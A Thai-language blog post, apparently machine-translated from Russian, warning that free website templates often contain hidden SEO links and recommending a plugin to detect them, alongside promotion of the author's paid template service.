ป.ล.ขณะที่เรียกดู TopSape Reader เมื่อเร็ว ๆ นี้ ฉันเห็นบล็อก SEO ใหม่ zenpr.ru ซึ่งครองอันดับ 1 ในหมู่บล็อกเกอร์ในแง่ของจำนวนคลิกต่อเดือน เนื่องจากอายุของเขาเพียงเดือนกว่า ผลลัพธ์จึงคู่ควรแก่การเคารพ การออกแบบในสไตล์มินิมัลลิสต์ถ้าไม่บอกว่าไม่มีอยู่จริง แต่ผู้เขียนเขียน - คุณจะอ่าน ธุรกิจทั้งหมดและไม่มีน้ำ เช่นเดียวกับในชื่อบล็อก - "อักขระพิเศษเป็นศูนย์" ฉันแนะนำให้อ่านคุณจะพบข้อมูลที่เป็นประโยชน์มากมาย

มีเทมเพลตเว็บไซต์ฟรีมากมายบนอินเทอร์เน็ต ที่ ฟรีชีสมันเกิดขึ้นแค่ในกับดักหนูเท่านั้น ใครๆ ก็รู้และยังเอื้อมมือไปดาวน์โหลดฟรีและติดตั้งบนเว็บไซต์ของคุณ

ก่อนติดตั้งเทมเพลตฟรี การตรวจสอบลิงก์ที่ซ่อนอยู่จะไม่เสียหาย

ด้วยการใส่เทมเพลตฟรี หลายคนไม่คิดว่าพวกเขาไม่สามารถโปรโมตและสร้างรายได้จากไซต์ดังกล่าวได้

ในเทมเพลตดังกล่าวสามารถมีได้หลายลิงค์พร้อมกัน นอกจากนี้ยังเป็นการดีหากลิงก์ที่ซ้อนกันนั้นเชื่อมโยงไปยังไซต์ที่คล้ายกับเรื่องของคุณ และไม่ใช่ไซต์สำหรับผู้ใหญ่ และจะมีเพียงสองหรือสามคนเท่านั้นไม่ใช่หลายสิบ

การติดตั้งเทมเพลตฟรีดังกล่าวคุกคามไซต์ของคุณอย่างไร ไซต์จะอยู่ภายใต้ตัวกรองซึ่งแทบจะเป็นไปไม่ได้เลยที่จะออกไป ไซต์ที่อยู่ภายใต้ตัวกรองเป็นไซต์ที่ตายแล้ว!
การติดตั้งเทมเพลตฟรีบนเว็บไซต์ของคุณก็เหมือนการเล่นรัสเซียนรูเล็ต โอกาสเดียวที่จะตั้งอย่างแน่นอน เทมเพลตที่สะอาด, เท่ากับศูนย์

อย่างดีที่สุด คุณจะได้รับ 3-5 ลิงก์ที่เหลืออยู่บนไซต์ของคุณ แน่นอนคุณสามารถลองล้างเทมเพลตดังกล่าวได้ แต่มีช่างฝีมือที่ป้อนลิงก์ลงในเทมเพลตในลักษณะที่ไม่สามารถลบออกจากที่นั่นได้ (เทมเพลตเสียมันแค่บิดเบี้ยว)

พูดตามตรง มันง่ายกว่าที่จะสั่งซื้อเทมเพลตใหม่ที่สะอาดและไม่ซ้ำใคร (ซึ่งไม่สามารถพูดได้ว่าฟรี) ซึ่งจะมีค่าใช้จ่ายน้อยกว่า

ตัวอย่างเช่น ฉันเรียกเก็บเงิน 200 รูเบิลสำหรับการสร้างเทมเพลต (เขียนถึง Skype: oxamitta) บอกเลยคุ้มไหม? รับฟรีและเสียไซต์ แต่ประหยัด 200 รูเบิล? ว้าว ประหยัด!!!

แต่ถ้าคุณได้เดิมพันกับเทมเพลตฟรีแล้ว จะตรวจสอบเทมเพลตสำหรับลิงก์ที่ซ่อนอยู่ได้อย่างไร

มีปลั๊กอินพิเศษสำหรับสิ่งนี้ การลบลิงก์เหล่านี้จะไม่ช่วย แต่เพื่อระบุลิงก์เหล่านี้ - ได้โปรด

อาจไม่ใช่ทุกอย่างที่น่ากลัวนัก และเทมเพลตของคุณมีลิงก์ภายนอกเพียงไม่กี่ลิงก์เท่านั้น! คุณต้องการทดสอบเทมเพลตหรือไม่ จากนั้นดาวน์โหลดปลั๊กอินจากลิงก์ด้านล่าง (หากต้องการดูลิงก์ดาวน์โหลดปลั๊กอิน ให้คลิกที่ปุ่มใดปุ่มหนึ่งของโซเชียลเน็ตเวิร์ก)

ปลั๊กอินได้รับการติดตั้งในแผงควบคุมของไซต์ด้วยวิธีมาตรฐาน มันไม่สมเหตุสมผลเลยที่จะถ่ายวิดีโอนี้ ดังนั้นวันนี้เราจะจัดการกับภาพหน้าจอสองสามภาพ

ติดตั้งปลั๊กอินและเปิดใช้งาน

หากต้องการขยายภาพหน้าจอให้คลิกด้วยปุ่มซ้ายของเมาส์

ไปที่แท็บลักษณะ TAS



กำลังโหลด...
สูงสุด